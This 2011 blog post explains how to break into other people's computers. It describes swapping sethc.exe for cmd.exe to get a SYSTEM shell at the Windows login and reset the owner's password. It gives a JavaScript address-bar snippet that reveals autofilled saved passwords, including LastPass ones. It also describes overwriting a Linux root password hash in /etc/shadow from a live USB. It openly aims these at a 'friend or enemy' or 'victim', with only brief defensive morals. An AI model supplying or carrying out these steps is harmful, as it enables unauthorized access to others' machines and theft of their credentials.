Tuesday, May 3, 2011

3 easy ways to bypass/get/break most common passwords!

Number 1 - Windows Vista/7 login password
Scenario
Ok, so you got hold of a computer(of a friend or enemy?) inside which you want to sneak into, but the damn Windows logon screen comes and you are unable to step inside.
Idea
Boot the computer using a Linux(read Ubuntu) pen drive. Now don't ask me how to create a bootable Ubuntu Pen Drive and how to boot into it. If you need me to tell you these things, then you are not eligible to read this blog post. Ok, so lets move on. Now you can open 'Places' in Ubuntu and mount the Windows partitions to see the files inside, provided the partitions or files are not encrypted. But who turns on encryption for their all files? I haven't seen anyone around.
But you don't want to stop yourself here and want to start Windows without knowing the password. There is a clever trick. But this will change the password of the owner of that computer. You may use this trick to irritate someone by changing their password against their will or to reset your password if you forgot your own password.
The trick works using the same Ubuntu bootable pen drive. After booting, just mount the C drive or the drive in which Windows 7 has been installed in the target machine. There navigate to Windows\System32 directory. There rename the file sethc.exe to sethc.exe.bak and rename the file cmd.exe to sethc.exe. You should also make a copy of cmd.exe somewhere before renaming it and after renaming place the copy of cmd.exe back in System32 folder. So, now the situation is that your original sethc.exe is named sethc.exe.bak. cmd.exe is named sethc.exe and a copy of cmd.exe is there in the System32 directory with the name cmd.exe.
Now reboot the computer and wait for Windows logon screen. Once the login screen comes, press the Shift key on the keyboard 5 times. A command prompt window will open. Now type there the following ommand and press enter: net user username new-password. Make sure to replace username with the computer owner's username and new-password with the new password you want to set. Voila!! ou just changed the password of Windows user without knowing current password!
How this works? The file sethc.exe is the program that executes when you press shift key 5 times. This is the sticky keys enabling program for differently abled people. So what we did is that we replaced this program with cmd.exe but kept the name sethc.exe. Now at login screen, on pressing Shift key 5 times cmd.exe ran and gave us the power to run any command with SYSTEM privilleges which is powerful enough to do whatever you want. Make sure that you revert everything back after your operation is successful.
Moral: You can't stop anyone from accessing your files or changing your password in Windows if you don't encrypt whole of your hard disk!!! Another workaround is to use a BIOS password and disable USB or CD/DVD booting by default.

Number 2 - Get all the saved passwords of websites from browsers
The trick
This trick exploits the eagerness of browser developers to make their browsers idiot-friendly. I am taking the case of Firefox. The trick works on Chrome and Opera as well. Most of the people have a habit to use their browser's feature to Remember Password for the sites they visit, ignorant of the fact that anyone who gets access to their computer for even one minute can get all their passwords in one go. For such a user just open their browser, say Firefox. Open the Settings dialog by Edit>Preferences in Linux and Tools>Options in Linux. Now go to Security tab. There click the 'Saved Passwords' button. OMG OMG OMG!!! All the passwords saved are visible in plain text form!!! The same trick works in Chrome too. Although there is an option to set Master password but most of the people don't do it. Ok now lets consider the case when some geeks out there don't use browser's feature to save passwords but they use a nifty little extension for browser called LastPass. It is available for Chrome, Opera and Firefox. Probably for IE too. How secure is that? Not at all. Just open any site, for example Facebook.com. If Facebook Home appears then log out. You will reach the login screen. You can see that Last Pass has filled up the password field with asteriks. Now paste this JavaScript code into address bar removing the previous url showing up there, then press enter!
javascript:var oOut,frameSearch=function (oFrame) {if(!oFrame){oFrame=window;}for(var oPass='',i=0,j=oFrame.document.forms;j[i];i++){for(var x=0,y;y=j[i].elements[x];x++){if(y.type=='password'&&y.value){oPass+='\n'+y.value;}}}for(var i=0;oFrame.frames[i];i++){try{oPass+=frameSearch(oFrame.frames[i]);}catch(e){}}return oPass;};void(oOut=frameSearch());if(oOut){alert('The following passwords were found:\n'+oOut);}else{alert('There are no passwords in forms on this page.');}
As soon as you press enter you will see the password in plain text! Isn't that a serious security concern???
Moral: The password is secure only if it is saved in your brain. But there too it isn't secure if you drink and have a girlfriend whom you love more than your password!!!

Case Number 3 - Change someone's Linux password!
This one is for those who think Linux is unbreakable. If you have a strong hammer, you can break anything!
What you have to do is to boot the target Linux system using a pen drive containing another Live linux distro. I recommend BackTrack4R2. Once you boot, just mount the partition containing target Linux. Open a terminal in backtrack and type passwd and press enter. Type the new password whatever you want. Now in backtrack navigate to /etc directory and open the shadow file. There copy the corresponding password of the root user and paste it into the target machine's /etc/shadow file in the line containing root that you can access by mounting their filesystem(if it is not encrypted). If you are confused where to copy, let me tell you about the break up of each line in the shadow file.
Each line consists of some fields which are separated by : i.e. colon symbol. If you know the PHP's explode function then you can separate the fields by using explode(":", $line). The first field is username. Second field is password. We don't need to know the rest. The password field seems to be too complex. But it too has fields contained in it!!! The fields are separated by $ symbol. The first field indicates the hashing algorithm. Second is the salt used to crypt the password and third is the crypted password itself. salts are used to shoo away brute forcers. To know more about salts you may search the internet. So what you have to actually do is that copy the password generated by backtrack from its /etc/shadow file and paste it in target machine's /etc/shadow file at the corresponding location.
Now reboot the computer and in the login screen of victim linux enter the newly created password. Voila! You are in!!!!!!
Moral: If you want to be safe from hackers cracking down your passwords and stealing your data then don't use a computer. Migrate to Himalayas and do some tapasya there.